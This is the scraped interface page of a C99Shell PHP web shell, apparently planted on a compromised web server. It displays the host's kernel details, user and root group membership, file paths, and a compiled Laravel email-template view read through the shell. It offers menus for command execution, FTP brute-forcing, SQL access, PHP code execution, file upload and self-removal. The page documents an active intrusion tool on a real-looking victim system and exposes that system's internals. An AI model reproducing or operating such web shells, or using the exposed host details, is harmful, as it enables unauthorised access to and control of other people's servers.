!C99Shell v. 2.5 [PHP 8 Update] [24.05.2025]!

Software: Apache. PHP/8.1.30 

uname -a: Linux server1.tuhinhossain.com 5.15.0-151-generic #161-Ubuntu SMP Tue Jul 22 14:25:40 UTC
2025 x86_64
 

uid=1002(picotech) gid=1003(picotech) groups=1003(picotech),0(root)  

Safe-mode: OFF (not secure)

/home/picotech/domains/picomail.picotech.app/public_html/storage/framework/views/   drwxr-xr-x
Free 28.27 GB of 117.98 GB (23.96%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Self remove    Logout    


Viewing file:     9267d51c23a0bc179b79b07fcb5eb4ed0c7f2f8d.php (2.33 KB)      -rw-r--r--
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |

<div class="form-group">
    <button class="btn btn-primary float-right mb-3 btn-sm" data-title="Add New Template" type="button" id="addNewTemplate"><?php echo e(trans('customer.add_template')); ?></button>
</div>
<div class="card-body table-responsive p-0 " style="height: 300px;">
    <table class="table table-head-fixed text-nowrap text-center">
        <thead>
        <tr>
            <th><?php echo e(trans('customer.subject')); ?></th>
            <th><?php echo e(trans('customer.status')); ?></th>
            <th><?php echo e(trans('customer.action')); ?></th>
        </tr>
        </thead>
        <tbody>
        <?php if($email_templates->isNotEmpty()): ?>
        <?php $__currentLoopData $email_templates$__env->addLoop($__currentLoopData); foreach($__currentLoopData as $email_template): $__env->incrementLoopIndices(); $loop $__env->getLastLoop(); ?>
        <tr>
            <td><?php echo e($email_template->title); ?></td>
            <td><?php if($email_template->status=='active'): ?>
            <span class="badge badge-success"><?php echo e($email_template->status); ?></span>
                <?php else: ?>
                    <span class="badge badge-danger"><?php echo e($email_template->status); ?></span>
                    <?php endif; ?>
            </td>
            <td><button type="button" data-value="<?php echo e(json_encode($email_template->only(['id','subject','status','body']))); ?>" class="btn btn-sm btn-info template-edit">Edit</button>
                <button class="btn btn-sm btn-danger" type="button" data-message="Are you sure you want to delete this template?"
                        data-action="<?php echo e(route('customer.email.template.delete',['id'=>$email_template->id])); ?>"
                data-input={"_method":"delete"}
                data-toggle="modal" data-target="#modal-confirm">Delete</button>
            </td>
        </tr>
        <?php endforeach; $__env->popLoop(); $loop $__env->getLastLoop(); ?>
        <?php else: ?>
            <tr>
                <td></td>
                <td colspan="1"><?php echo e(trans('customer.no_data_available')); ?></td>
            </tr>
            <?php endif; ?>
        </tbody>
    </table>
</div>

<?php /**PATH /home/pcolfjqt/mail.picotech.app/resources/views/customer/settings/email_template.blade.php ENDPATH**/ ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 

:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 2.5 [PHP 8 Update] [24.05.2025] | Generation time: 0.0492 ]--